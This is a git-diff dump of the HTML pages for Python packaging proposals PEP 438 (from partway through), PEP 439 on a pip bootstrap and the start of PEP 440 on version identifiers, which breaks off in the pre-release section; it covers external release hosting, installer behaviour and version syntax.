Alternative PyPI server implementations should implement the new +simple index serving behaviour of transition phase 1 to avoid +installation tools treating their release links as external ones in +phase 2.

+
+
+

Rationale

+
+

History and motivations for external hosting

+

When PyPI went online, it offered release registration but had no +facility to host release files itself. When hosting was added, no +automated downloading tool existed yet. When Phillip Eby implemented +automated downloading (through setuptools), he made the choice to +allow people to use download hosts of their choice. The finding of +externally-hosted packages was implemented as follows:

+
    +
  1. The PyPI simple/ index for a package contains all links found +by scraping them from that package’s long_description metadata for +any release. Links in the “Download-URL” and “Home-page” metadata +fields are given rel=download and rel=homepage attributes, +respectively.
  2. +
  3. Any of these links whose target is a file whose name appears to be +in the form of an installable source or binary distribution, with +name in the form “packagename-version.ARCHIVEEXT”, is considered a +potential installation candidate by installation tools.
  4. +
  5. Similarly, any links suffixed with an “#egg=packagename-version” +fragment are considered an installation candidate.
  6. +
  7. Additionally, the rel=homepage and rel=download links are +crawled by installation tools and, if HTML, are themselves scraped +for release-file links in the above formats.
  8. +
+

See the easy_install documentation for a complete description of this +behavior. [1]
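A rough Python sketch of these candidate rules (illustrative only, not easy_install’s actual code; the archive-extension list is an assumed subset):

from urllib.parse import unquote, urlparse

ARCHIVE_EXTS = (".tar.gz", ".tgz", ".tar.bz2", ".zip", ".egg")  # assumed subset

def is_candidate(url, project):
    parsed = urlparse(url)
    # Rule 3: an "#egg=packagename-version" fragment marks a candidate.
    if parsed.fragment.startswith("egg="):
        return unquote(parsed.fragment[4:]).startswith(project + "-")
    # Rule 2: a filename of the form "packagename-version.ARCHIVEEXT".
    filename = unquote(parsed.path.rsplit("/", 1)[-1])
    return filename.startswith(project + "-") and filename.endswith(ARCHIVE_EXTS)

print(is_candidate("https://example.com/foo-1.0.tar.gz", "foo"))  # True
print(is_candidate("https://example.com/dl#egg=foo-1.0", "foo"))  # True
print(is_candidate("https://example.com/index.html", "foo"))      # False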

+

Today, most packages indexed on PyPI host their release files on +PyPI. Out of 29,117 total projects on PyPI, only 2,581 (less than 10%) +include any links to installable files that are available only +off-PyPI. [2]

+

There are many reasons [3] why people have chosen external +hosting. To cite just a few:

+
    +
  • release processes and scripts have been developed already and upload +to external sites
  • +
  • it takes too long to upload large files from some places in the +world
  • +
  • export restrictions e.g. for crypto-related software
  • +
  • company policies which require offering open source packages through +own sites
  • +
  • problems with integrating uploading to PyPI into one’s release +process (because of release policies)
  • +
  • desiring download statistics different from those maintained by PyPI
  • +
  • perceived bad reliability of PyPI
  • +
  • not aware that PyPI offers file-hosting
  • +
+

Irrespective of the present-day validity of these reasons, there is clearly a history of why people chose to host files externally, and for some time it was the only way to do things. This PEP takes the position that there remain some valid reasons for external hosting even today.

+
+
+

Problem

+

Today, Python package installers (pip, easy_install, buildout, and others) often need to query many non-PyPI URLs even if there are no externally hosted files. Apart from querying pypi.python.org’s simple index pages, installers also crawl all homepages and download pages ever specified with any release of a package. The need for installers to crawl external sites slows down installation and makes for a brittle and unreliable installation process. Those sites and packages also don’t take part in the PEP 381 mirroring infrastructure, further decreasing the reliability and speed of automated installation processes around the world.

+

Most packages are hosted directly on pypi.python.org [2]. Even for +these packages, installers still crawl their homepage and +download-url, if specified. Many package uploaders are not aware that +specifying the “homepage” or “download-url” in their package metadata +will needlessly slow down the installation process for all users.

+

Relying on third party sites also opens up more attack vectors for +injecting malicious packages into sites using automated installs. A +simple attack might just involve getting hold of an old now-unused +homepage domain and placing malicious packages there. Moreover, +performing a Man-in-The-Middle (MITM) attack between an installation +site and any of the download sites can inject malicious packages on +the installation site. As many homepages and download locations are +using HTTP and not HTTPS, such attacks are not hard to launch. Such +MITM attacks can easily happen even for packages which never intended +to host files externally as their homepages are contacted by +installers anyway.

+

There is currently no way for package maintainers to avoid +external-link crawling, other than removing all homepage/download url +metadata for all historic releases. While a script [4] has been +written to perform this action, it is not a good general solution +because it removes useful metadata from PyPI releases.

+

Even if the sites referenced by “Homepage” and “Download-URL” links +were not scraped for further links, there is no obvious way under the +current system for a package owner to link to an installable file from +a long_description metadata field (which is shown as package +documentation on /pypi/PKG) without installation tools +automatically considering that file a candidate for installation. +Conversely, there is no way to explicitly register multiple external +release files without putting them in metadata fields.

+
+
+

Goals

+

These are the goals to be achieved by implementation of this PEP:

+
    +
  • Package owners should be able to explicitly control which files are +presented by PyPI to installer tools as installation +candidates. Installation should not be slowed and made less reliable +by extensive and unnecessary crawling of links that package owners +did not explicitly nominate as installation files.
  • +
  • It should remain possible for package owners to choose to host their +release files on their own hosting, external to PyPI. It should be +easy for a user to request the installation of such releases using +automated installer tools, especially if the external release files +were registered together with a checksum hash.
  • +
  • Automated installer tools should not install externally-hosted +packages by default, but require explicit authorization to do so +by the user. When tools refuse to install such a package by default, +they should tell the user exactly which external link(s) the +installer needs to follow, and what option(s) the user can provide +to authorize the tool to follow those links. PyPI should provide all +necessary metadata for installer tools to implement this easily and +within a single request/reply interaction.
  • +
  • Migration from the status quo to the above points should be gradual +and minimize breakage. This includes tooling that makes it easy for +package owners with an existing release process that uploads to +non-PyPI hosting to also upload those release files to PyPI.
  • +
+
+
+
+

Solution / two transition phases

+

The first transition phase introduces a “hosting-mode” field for each project on PyPI, allowing package owners explicit control of which release file links are served to present-day installation tools in the machine-readable simple/ index. The first transition phase will, after successful hosting-mode manipulations by individual early adopters, set a default hosting mode for existing packages, based on automated analysis. Maintainers will be notified one month ahead of any such automated change. At completion of the first transition phase, all present-day existing release and installation processes and tools are expected to continue working. Any remaining errors or problems are expected to only relate to installation of individual packages and can be easily corrected by package maintainers or PyPI admins if maintainers are not reachable.

+

Also in the first phase, each link served in the simple/ index +will be explicitly marked as rel="internal" if it is hosted by the +index itself (even if on a separate domain, which may be the case if +the index uses a CDN for file-serving). Any link not so marked will be +considered an external link.

+

In the second transition phase, PyPI client installation tools shall +be updated to default to only install rel="internal" packages +unless a user specifies option(s) to permit installing from external +links. See second transition phase for details on how installers +should behave.

+

Maintainers of packages which currently host release files on non-PyPI +sites shall receive instructions and tools to ease “re-hosting” of +their historic and future package release files. This re-hosting tool +MUST be available before automated hosting-mode changes are announced +to package maintainers.

+
+
+

Implementation

+
+

Hosting modes

+

The foundation of the first transition phase is the introduction of +three “modes” of PyPI hosting for a package, affecting which links are +generated for the simple/ index. These modes are implemented +without requiring changes to installation tools via changes to the +algorithm for generating the machine-readable simple/ index.

+

The modes are:

+
    +
  • pypi-scrape-crawl: no change from the current situation of +generating machine-readable links for installation tools, as +outlined in the history.
  • +
  • pypi-scrape: for a package in this mode, links to be added to +the simple/ index are still scraped from package +metadata. However, the “Home-page” and “Download-url” links are +given rel=ext-homepage and rel=ext-download attributes +instead of rel=homepage and rel=download. The effect of this +(with no change in installation tools necessary) is that these links +will not be followed and scraped for further candidate links by +present-day installation tools: only installable files directly +hosted from PyPI or linked directly from PyPI metadata will be +considered for installation. Installation tools MAY evolve to offer +an option to use the new rel-attribution to crawl external pages but +MUST NOT default to it.
  • +
  • pypi-explicit: for a package in this mode, only links to release +files uploaded to PyPI, and external links to release files +explicitly nominated by the package owner, will be added to the +simple/ index. PyPI will provide a new interface for package +owners to supply external release-file URLs. These URLs MUST include +a URL fragment in the form “#hashtype=hashvalue” specifying a hash +of the externally-linked file which installer tools MUST use to +validate that they have downloaded the intended file.
  • +
+

Thus the hope is that eventually all projects on PyPI can be migrated +to the pypi-explicit mode, while preserving the ability to install +release files hosted externally via installer tools. Deprecation of +hosting modes to eventually only allow the pypi-explicit mode is +NOT REGULATED by this PEP but is expected to become feasible some time +after successful implementation of the transition phases described in +this PEP. It is expected that deprecation requires a new process to +deal with abandoned packages because of unreachable maintainers for +still popular packages.

+
+
+

First transition phase (PyPI)

+

The proposed solution consists of multiple implementation and +communication steps:

+
    +
  1. Implement in PyPI the three modes described above, with an +interface for package owners to select the mode for each package +and register explicit external file URLs.
  2. +
  3. For packages in all modes, label links in the simple/ index to +index-hosted files with rel="internal", to make it easier for +client tools to distinguish these links in the second phase.
  4. +
  5. Add an HTML tag <meta name="api-version" value="2"> to all +simple/ index pages, to allow clients to distinguish between +indexes providing the rel="internal" metadata and older ones +that do not.
  6. +
  7. Default all newly-registered packages to pypi-explicit mode +(package owners can still switch to the other modes as desired).
  8. +
  9. Determine (via automated analysis [2]) which packages have all +installable files available on PyPI itself (group A), which have +all installable files on PyPI or linked directly from PyPI metadata +(group B), and which have installable versions available that are +linked only from external homepage/download HTML pages (group C).
  10. +
  11. Send mail to maintainers of projects in group A that their project +will be automatically configured to pypi-explicit mode in one +month, and similarly to maintainers of projects in group B that +their project will be automatically configured to pypi-scrape +mode. Inform them that this change is not expected to affect +installability of their project at all, but will result in faster +and safer installs for their users. Encourage them to set this +mode themselves sooner to benefit their users.
  12. +
  13. Send mail to maintainers of packages in group C that their package +hosting mode is pypi-scrape-crawl, list the URLs which +currently are crawled, and suggest that they either re-host their +packages directly on PyPI and switch to pypi-explicit, or at +least provide direct links to release files in PyPI metadata and +switch to pypi-scrape. Provide instructions and tools to help +with these transitions.
  14. +
+
+
+

Second transition phase (installer tools)

+

For the second transition phase, maintainers of installation tools are +asked to release two updates.

+

The first update shall provide clear warnings if externally-hosted release files (that is, files whose link does not include rel="internal") are selected for download, state exactly for which projects and URLs this happens, and warn that in future versions externally-hosted downloads will be disabled by default.

+

The second update should change the default mode to allow only +installation of rel="internal" package files, and allow +installation of externally-hosted packages only when the user supplies +an option.

+

The installer should distinguish between verifiable and non-verifiable +external links. A verifiable external link is a direct link to an +installable file from the PyPI simple/ index that includes a hash +in the URL fragment (“#hashtype=hashvalue”) which can be used to +verify the integrity of the downloaded file. A non-verifiable external +link is any link (other than those explicitly supplied by the user of +an installer tool) without a hash, scraped from external HTML, or +injected into the search via some other non-PyPI source +(e.g. setuptools’ dependency_links feature).
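For illustration, a minimal sketch (not pip’s actual implementation) of checking a download against such a “#hashtype=hashvalue” fragment:

import hashlib
from urllib.parse import urlparse

def verify_download(url, data):
    fragment = urlparse(url).fragment            # e.g. "sha256=9f86d0..."
    hashtype, _, expected = fragment.partition("=")
    if not hashtype or not expected:
        return False                             # non-verifiable link
    return hashlib.new(hashtype, data).hexdigest() == expected

payload = b"release file bytes"
url = ("https://host.example/foo-1.0.tar.gz#sha256="
       + hashlib.sha256(payload).hexdigest())
print(verify_download(url, payload))                                    # True
print(verify_download("https://host.example/foo-1.0.tar.gz", payload))  # False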

+

Installers should provide a blanket option to allow +installing any verifiable external link. Non-verifiable external links +should only be installed if the user-provided option specifies exactly +which external domains can be used or for which specific package names +external links can be used.

+

When download of an externally-hosted package is disallowed by the +default configuration, the user should be notified, with instructions +for how to make the install succeed and warnings about the implication +(that a file will be downloaded from a site that is not part of the +package index). The warning given for non-verifiable links should +clearly state that the installer cannot verify the integrity of the +downloaded file. The warning given for verifiable external links +should simply note that the file will be downloaded from an external +URL, but that the file integrity can be verified by checksum.

+

Alternative PyPI-compatible index implementations should upgrade to +begin providing the rel="internal" metadata and the <meta +name="api-version" value="2"> tag as soon as possible. For +alternative indexes which do not yet provide the meta tag in their +simple/ pages, installation tools should provide +backwards-compatible fallback behavior (treat links as internal as in +pre-PEP times and provide a warning).

+
+
+

API For Submitting External Distribution URLs

+

New distribution URLs may be submitted by performing an HTTP POST to the URL:

+
+
+

With the following form-encoded data:

+ + + + + + + + + + + + + + + + + + + + + +
Name            Value
:action         The string “urls”
name            The package name as a string
version         The release version as a string
new-url         The new URL to store
submit_new_url  The string “yes”
+

The POST must be accompanied by an HTTP Basic Auth header encoding the +username and password of the user authorized to maintain the package +on PyPI.

+

The HTTP response to this request will be one of:

+ + + + + + + + + + + + + + + + + + + + + + + +
Code  Meaning       URL submission implications
200   OK            Everything worked just fine
400   Bad request   Data provided for submission was malformed
401   Unauthorised  The username or password supplied were incorrect
403   Forbidden     User does not have permission to update the package
                    information (not Owner or Maintainer)
+
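A hedged sketch of such a submission using only the standard library; the endpoint URL is elided above, so INDEX_URL is a placeholder, as are the credentials and package details:

import base64
import urllib.parse
import urllib.request

INDEX_URL = "https://pypi.example/pypi"     # placeholder for the elided endpoint

data = urllib.parse.urlencode({
    ":action": "urls",
    "name": "example-package",
    "version": "1.0",
    "new-url": "https://files.example/example-package-1.0.tar.gz#md5=...",
    "submit_new_url": "yes",
}).encode()

request = urllib.request.Request(INDEX_URL, data=data)          # HTTP POST
credentials = base64.b64encode(b"username:password").decode()   # HTTP Basic Auth
request.add_header("Authorization", "Basic " + credentials)

# Expect 200 on success; 400/401/403 as listed in the table above.
with urllib.request.urlopen(request) as response:
    print(response.status)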
+
+
+

References

+ +
+
+

Acknowledgments

+

Phillip Eby for precise information and the basic ideas to implement +the transition via server-side changes only.

+

Donald Stufft for pushing away from external hosting and offering to +implement both a Pull Request for the necessary PyPI changes and the +analysis tool to drive the transition phase 1.

+

Marc-Andre Lemburg, Alyssa Coghlan and catalog-sig in general for +thinking through issues regarding getting rid of “external hosting”.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0438.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0439/index.html new file mode 100644 index 00000000000..e814bf199cb --- /dev/null +++ b/pep-0439/index.html @@ -0,0 +1,348 @@
PEP 439 – Inclusion of implicit pip bootstrap in Python installation | peps.python.org
+
+


+ + +
+
+
+

PEP 439 – Inclusion of implicit pip bootstrap in Python installation

+
+
Author:
+
Richard Jones <richard at python.org>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-Mar-2013
+
Python-Version:
+
3.4
+
Post-History:
+
19-Mar-2013
+
Resolution:
+
Distutils-SIG message
+
+
+
+
+
+

Abstract

+

This PEP proposes the inclusion of a pip bootstrap executable in the +Python installation to simplify the use of 3rd-party modules by Python +users.

+

This PEP does not propose to include the pip implementation in the +Python standard library. Nor does it propose to implement any package +management or installation mechanisms beyond those provided by PEP +427 (“The Wheel Binary Package Format 1.0”) and TODO distlib PEP.

+
+
+

PEP Rejection

+

This PEP has been rejected in favour of a more explicit mechanism that +should achieve the same end result in a more reliable fashion. The more +explicit bootstrapping mechanism is described in PEP 453.

+
+
+

Rationale

+

Currently the user story for installing 3rd-party Python modules is +not as simple as it could be. It requires that all 3rd-party modules +inform the user of how to install the installer, typically via a link +to the installer. That link may be out of date or the steps required +to perform the install of the installer may be enough of a roadblock +to prevent the user from further progress.

+

Large Python projects which emphasise a low barrier to entry have +shied away from depending on third party packages because of the +introduction of this potential stumbling block for new users.

+

With the inclusion of the package installer command in the standard +Python installation the barrier to installing additional software is +considerably reduced. It is hoped that this will therefore increase +the likelihood that Python projects will reuse third party software.

+

The Python community also has an issue of complexity around the current +bootstrap procedure for pip and setuptools. They all have +their own bootstrap download file with slightly different usages and +even refer to each other in some cases. Having a single bootstrap which +is common amongst them all, with a simple usage, would be far preferable.

+

It is also hoped that this will reduce the number of proposals to include more and more software in the Python standard library, and therefore that more popular Python software will be more easily upgradeable without requiring Python installation upgrades.

+
+
+

Proposal

+

The bootstrap will install the pip implementation and setuptools by downloading their installation files from PyPI.

+

This proposal affects two components of packaging: the pip bootstrap and, +thanks to easier package installation, modifications to publishing +packages.

+

The core of this proposal is that the user experience of using pip should not +require the user to install pip.

+
+

The pip bootstrap

+

The Python installation includes an executable called “pip3” (see PEP 394 for naming rationale etc.) that attempts to import pip machinery. If it can, the pip command proceeds as normal. If it cannot, it will bootstrap pip by downloading the pip implementation and setuptools wheel files. Hereafter the installation of the “pip implementation” will imply installation of setuptools and virtualenv. Once installed, the pip command proceeds as normal. Once the bootstrap process is complete, the “pip3” command is no longer the bootstrap but rather the full pip command.
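A minimal sketch of that control flow; install_pip_from_pypi is a hypothetical stand-in for the wheel download-and-install step described in this PEP:

import importlib.util
import runpy

def install_pip_from_pypi():
    # Hypothetical: securely download the pip and setuptools wheel files
    # from PyPI and install them, as described elsewhere in this PEP.
    raise NotImplementedError

def pip3():
    if importlib.util.find_spec("pip") is None:   # can we import pip machinery?
        install_pip_from_pypi()                   # no: bootstrap it first
    runpy.run_module("pip", run_name="__main__", alter_sys=True)  # run full pip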

+

A bootstrap is used in place of the full pip code so that we don’t have to bundle pip, and so that pip remains upgradeable outside of the regular Python upgrade timeframe and processes.

+

To avoid issues with sudo we will have the bootstrap default to +installing the pip implementation to the per-user site-packages +directory defined in PEP 370 and implemented in Python 2.6/3.0. Since +we avoid installing to the system Python we also avoid conflicting +with any other packaging system (on Linux systems, for example.) If +the user is inside a PEP 405 virtual environment then the pip +implementation will be installed into that virtual environment.
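As a sketch of that default-target decision (detecting a PEP 405 environment via sys.base_prefix is an assumption of this sketch, not language from the PEP):

import site
import sys

def default_install_target():
    in_venv = sys.prefix != getattr(sys, "base_prefix", sys.prefix)  # PEP 405
    if in_venv:
        return sys.prefix                 # install into the virtual environment
    return site.getusersitepackages()     # per-user site-packages (PEP 370)

print(default_install_target())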

+

The bootstrap process will proceed as follows:

+
    +
  1. The user system has Python (3.4+) installed. In the “scripts” +directory of the Python installation there is the bootstrap script +called “pip3”.
  2. +
  3. The user will invoke a pip command, typically “pip3 install +<package>”, for example “pip3 install Django”.
  4. +
  5. The bootstrap script will attempt to import the pip implementation. +If this succeeds, the pip command is processed normally. Stop.
  6. +
  7. On failing to import the pip implementation the bootstrap notifies +the user that it needs to “install pip”. It will ask the user whether it +should install pip as a system-wide site-packages or as a user-only +package. This choice will also be present as a command-line option to pip +so non-interactive use is possible.
  8. +
9. The bootstrap will then contact PyPI to obtain the latest download wheel file (see PEP 427).
  10. +
  11. Upon downloading the file it is installed using “python setup.py install”.
  12. +
  13. The pip tool may now import the pip implementation and continues to +process the requested user command normally.
  14. +
+

Users may be running in an environment which cannot access the public +Internet and are relying solely on a local package repository. They +would use the “-i” (Base URL of Python Package Index) argument to the +“pip3 install” command. This simply overrides the default index URL pointing +to PyPI.

+

Some users may have no Internet access suitable for fetching the pip +implementation file. These users can manually download and install the +setuptools and pip tar files. Adding specific support for this use-case is +unnecessary.

+

The download of the pip implementation install file will be performed +securely. The transport from pypi.python.org will be done over HTTPS with the +CA certificate check performed. This facility will be present in Python 3.4+ +using Operating System certificates (see PEP XXXX).

+

Beyond those arguments controlling index location and download +options, the “pip3” bootstrap command may support further standard pip +options for verbosity, quietness and logging.

+

The “pip3” command will support two new command-line options that are used +in the bootstrapping, and otherwise ignored. They control where the pip +implementation is installed:

+
+
--bootstrap
Install to the user’s packages directory. The name of this option is chosen +to promote it as the preferred installation option.
+
--bootstrap-to-system
Install to the system site-packages directory.
+
+

These command-line options will also need to be implemented, but otherwise +ignored, in the pip implementation.

+

Consideration should be given to defaulting pip to install packages to the +user’s packages directory if pip is installed in that location.

+

The “--no-install” option to the “pip3” command will not affect the bootstrapping process.

+
+
+

Modifications to publishing packages

+

An additional new Python package is proposed, “pypublish”, which +will be a tool for publishing packages to PyPI. It would replace the +current “python setup.py register” and “python setup.py upload” +distutils commands. Again because of the measured Python release +cycle and extensive existing Python installations these commands are +difficult to bugfix and extend. Additionally it is desired that the +“register” and “upload” commands be able to be performed over HTTPS +with certificate validation. Since shipping CA certificate keychains +with Python is not really feasible (updating the keychain is quite +difficult to manage) it is desirable that those commands, and the +accompanying keychain, be made installable and upgradeable outside of +Python itself.

+

The existing distutils mechanisms for package registration and upload would +remain, though with a deprecation warning.

+
+
+
+

Implementation

+

The changes to pip required by this PEP are being tracked in that project’s issue tracker [2]. Most notably, the addition of --bootstrap and --bootstrap-to-system to the pip command-line.

+

It would be preferable that the pip and setuptools projects distribute a wheel +format download.

+

The required code for this implementation is the “pip3” command described +above. The additional pypublish can be developed outside of the scope of this +PEP’s work.

+

Finally, it would be desirable that “pip3” be ported to Python 2.6+ to allow +the single command to replace existing pip, setuptools and virtualenv (which +would be added to the bootstrap) bootstrap scripts. Having that bootstrap +included in a future Python 2.7 release would also be highly desirable.

+
+
+

Risks

+

The key that is used to sign the pip implementation download might be +compromised and this PEP currently proposes no mechanism for key +revocation.

+

There is a Perl package installer also named “pip”. It is quite rare and not commonly used. The Fedora variant of Linux has historically named Python’s “pip” as “python-pip” and Perl’s “pip” as “perl-pip”. This policy has been altered [3] so that future and upgraded Fedora installations will use the name “pip” for Python’s “pip”. Existing (non-upgraded) installations will still have the old name for the Python “pip”, though the potential for confusion is now much reduced.

+
+
+

References

+ +
+
+

Acknowledgments

+

Alyssa Coghlan for her thoughts on the proposal and dealing with the Red +Hat issue.

+

Jannis Leidel and Carl Meyer for their thoughts. Marcus Smith for feedback.

+

Marcela Mašláňová for resolving the Fedora issue.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0439.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0440/index.html new file mode 100644 index 00000000000..7e4e41530c2 --- /dev/null +++ b/pep-0440/index.html @@ -0,0 +1,1674 @@
PEP 440 – Version Identification and Dependency Specification | peps.python.org
+
+


+ + +
+
+
+

PEP 440 – Version Identification and Dependency Specification

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-Mar-2013
+
Post-History:
+
30-Mar-2013, 27-May-2013, 20-Jun-2013, +21-Dec-2013, 28-Jan-2014, 08-Aug-2014, +22-Aug-2014
+
Replaces:
+
386
+
Resolution:
+
Distutils-SIG message
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Version specifiers, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes a scheme for identifying versions of Python software +distributions, and declaring dependencies on particular versions.

+

This document addresses several limitations of the previous attempt at a +standardized approach to versioning, as described in PEP 345 and PEP 386.

+
+
+

Definitions

+

The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, +“SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this +document are to be interpreted as described in RFC 2119.

+

“Projects” are software components that are made available for integration. +Projects include Python libraries, frameworks, scripts, plugins, +applications, collections of data or other resources, and various +combinations thereof. Public Python projects are typically registered on +the Python Package Index.

+

“Releases” are uniquely identified snapshots of a project.

+

“Distributions” are the packaged files which are used to publish +and distribute a release.

+

“Build tools” are automated tools intended to run on development systems, +producing source and binary distribution archives. Build tools may also be +invoked by integration tools in order to build software distributed as +sdists rather than prebuilt binary archives.

+

“Index servers” are active distribution registries which publish version and +dependency metadata and place constraints on the permitted metadata.

+

“Publication tools” are automated tools intended to run on development +systems and upload source and binary distribution archives to index servers.

+

“Installation tools” are integration tools specifically intended to run on +deployment targets, consuming source and binary distribution archives from +an index server or other designated location and deploying them to the target +system.

+

“Automated tools” is a collective term covering build tools, index servers, +publication tools, integration tools and any other software that produces +or consumes distribution version and dependency metadata.

+
+
+

Version scheme

+

Distributions are identified by a public version identifier which supports all defined version comparison operations.

+

The version scheme is used both to describe the distribution version +provided by a particular distribution archive, as well as to place +constraints on the version of dependencies needed in order to build or +run the software.

+
+

Public version identifiers

+

The canonical public version identifiers MUST comply with the following +scheme:

+
[N!]N(.N)*[{a|b|rc}N][.postN][.devN]
+
+
+

Public version identifiers MUST NOT include leading or trailing whitespace.

+

Public version identifiers MUST be unique within a given distribution.

+

Installation tools SHOULD ignore any public versions which do not comply with +this scheme but MUST also include the normalizations specified below. +Installation tools MAY warn the user when non-compliant or ambiguous versions +are detected.

+

See also Appendix B : Parsing version strings with regular expressions +which provides a regular expression to check strict conformance with the +canonical format, as well as a more permissive regular expression accepting +inputs that may require subsequent normalization.
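As a rough illustration only (Appendix B gives the authoritative expressions), a compact regular expression for the canonical form, omitting local version labels:

import re

CANONICAL = re.compile(
    r"^([1-9][0-9]*!)?"                      # [N!]        epoch
    r"(0|[1-9][0-9]*)(\.(0|[1-9][0-9]*))*"   # N(.N)*      release segment
    r"((a|b|rc)(0|[1-9][0-9]*))?"            # [{a|b|rc}N] pre-release
    r"(\.post(0|[1-9][0-9]*))?"              # [.postN]    post-release
    r"(\.dev(0|[1-9][0-9]*))?$"              # [.devN]     developmental release
)

for version in ("1.0", "1!2.0", "1.1rc1", "1.0.post1.dev2", "1.0-1", "1.1RC1"):
    print(version, bool(CANONICAL.match(version)))
# The last two are acceptable inputs but require normalization first.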

+

Public version identifiers are separated into up to five segments:

+
    +
  • Epoch segment: N!
  • +
  • Release segment: N(.N)*
  • +
  • Pre-release segment: {a|b|rc}N
  • +
  • Post-release segment: .postN
  • +
  • Development release segment: .devN
  • +
+

Any given release will be a “final release”, “pre-release”, “post-release” or +“developmental release” as defined in the following sections.

+

All numeric components MUST be non-negative integers represented as sequences +of ASCII digits.

+

All numeric components MUST be interpreted and ordered according to their +numeric value, not as text strings.

+

All numeric components MAY be zero. Except as described below for the +release segment, a numeric component of zero has no special significance +aside from always being the lowest possible value in the version ordering.

+
+

Note

+

Some hard to read version identifiers are permitted by this scheme in +order to better accommodate the wide range of versioning practices +across existing public and private Python projects.

+

Accordingly, some of the versioning practices which are technically +permitted by the PEP are strongly discouraged for new projects. Where +this is the case, the relevant details are noted in the following +sections.

+
+
+
+

Local version identifiers

+

Local version identifiers MUST comply with the following scheme:

+
<public version identifier>[+<local version label>]
+
+
+

They consist of a normal public version identifier (as defined in the +previous section), along with an arbitrary “local version label”, separated +from the public version identifier by a plus. Local version labels have +no specific semantics assigned, but some syntactic restrictions are imposed.

+

Local version identifiers are used to denote fully API (and, if applicable, +ABI) compatible patched versions of upstream projects. For example, these +may be created by application developers and system integrators by applying +specific backported bug fixes when upgrading to a new upstream release would +be too disruptive to the application or other integrated system (such as a +Linux distribution).

+

The inclusion of the local version label makes it possible to differentiate +upstream releases from potentially altered rebuilds by downstream +integrators. The use of a local version identifier does not affect the kind +of a release but, when applied to a source distribution, does indicate that +it may not contain the exact same code as the corresponding upstream release.

+

To ensure local version identifiers can be readily incorporated as part of +filenames and URLs, and to avoid formatting inconsistencies in hexadecimal +hash representations, local version labels MUST be limited to the following +set of permitted characters:

+
    +
  • ASCII letters ([a-zA-Z])
  • +
  • ASCII digits ([0-9])
  • +
  • periods (.)
  • +
+

Local version labels MUST start and end with an ASCII letter or digit.

+

Comparison and ordering of local versions considers each segment of the local version (divided by a .) separately. If a segment consists entirely of ASCII digits then that section should be considered an integer for comparison purposes, and if a segment contains any ASCII letters then that segment is compared lexicographically with case insensitivity. When comparing a numeric and lexicographic segment, the numeric section always compares as greater than the lexicographic segment. Additionally a local version with a greater number of segments will always compare as greater than a local version with fewer segments, as long as the shorter local version’s segments match the beginning of the longer local version’s segments exactly.
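An illustrative sort key for local version labels (a sketch, not the packaging ecosystem’s implementation):

def local_key(label):
    # Numeric segments compare as integers and rank above lexicographic ones.
    return [(1, int(seg)) if seg.isdigit() else (0, seg.lower())
            for seg in label.split(".")]

labels = ["ubuntu.11", "ubuntu.2", "UBUNTU.2", "abc", "5"]
print(sorted(labels, key=local_key))
# ['abc', 'ubuntu.2', 'UBUNTU.2', 'ubuntu.11', '5'] -- case-insensitive,
# numeric beats lexicographic, and "5" outranks every alphanumeric label.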

+

An “upstream project” is a project that defines its own public versions. A +“downstream project” is one which tracks and redistributes an upstream project, +potentially backporting security and bug fixes from later versions of the +upstream project.

+

Local version identifiers SHOULD NOT be used when publishing upstream +projects to a public index server, but MAY be used to identify private +builds created directly from the project source. Local +version identifiers SHOULD be used by downstream projects when releasing a +version that is API compatible with the version of the upstream project +identified by the public version identifier, but contains additional changes +(such as bug fixes). As the Python Package Index is intended solely for +indexing and hosting upstream projects, it MUST NOT allow the use of local +version identifiers.

+

Source distributions using a local version identifier SHOULD provide the +python.integrator extension metadata (as defined in PEP 459).

+
+
+

Final releases

+

A version identifier that consists solely of a release segment and optionally +an epoch identifier is termed a “final release”.

+

The release segment consists of one or more non-negative integer +values, separated by dots:

+
N(.N)*
+
+
+

Final releases within a project MUST be numbered in a consistently +increasing fashion, otherwise automated tools will not be able to upgrade +them correctly.

+

Comparison and ordering of release segments considers the numeric value +of each component of the release segment in turn. When comparing release +segments with different numbers of components, the shorter segment is +padded out with additional zeros as necessary.

+

While any number of additional components after the first are permitted +under this scheme, the most common variants are to use two components +(“major.minor”) or three components (“major.minor.micro”).

+

For example:

+
0.9
+0.9.1
+0.9.2
+...
+0.9.10
+0.9.11
+1.0
+1.0.1
+1.1
+2.0
+2.0.1
+...
+
+
+

A release series is any set of final release numbers that start with a +common prefix. For example, 3.3.1, 3.3.5 and 3.3.9.45 are all +part of the 3.3 release series.

+
+

Note

+

X.Y and X.Y.0 are not considered distinct release numbers, as the release segment comparison rules implicitly expand the two-component form to X.Y.0 when comparing it to any release segment that includes three components.

+
+
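A small sketch of the zero-padding rule and the note above (illustrative only):

from itertools import zip_longest

def release_key(release):
    return tuple(int(part) for part in release.split("."))

def same_release(a, b):
    # Pad the shorter release segment with zeros before comparing.
    pairs = zip_longest(release_key(a), release_key(b), fillvalue=0)
    return all(x == y for x, y in pairs)

print(same_release("3.3", "3.3.0"))                  # True: X.Y == X.Y.0
print(release_key("0.9.10") > release_key("0.9.2"))  # True: numeric ordering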

Date based release segments are also permitted. An example of a date based +release scheme using the year and month of the release:

+
2012.4
+2012.7
+2012.10
+2013.1
+2013.6
+...
+
+
+
+
+

Pre-releases

+

Some projects use an “alpha, beta, release candidate” pre-release cycle to +support testing by their users prior to a final release.

+

If used as part of a project’s development cycle, these pre-releases are +indicated by including a pre-release segment in the version identifier:

+
X.YaN   # Alpha release
+X.YbN   # Beta release
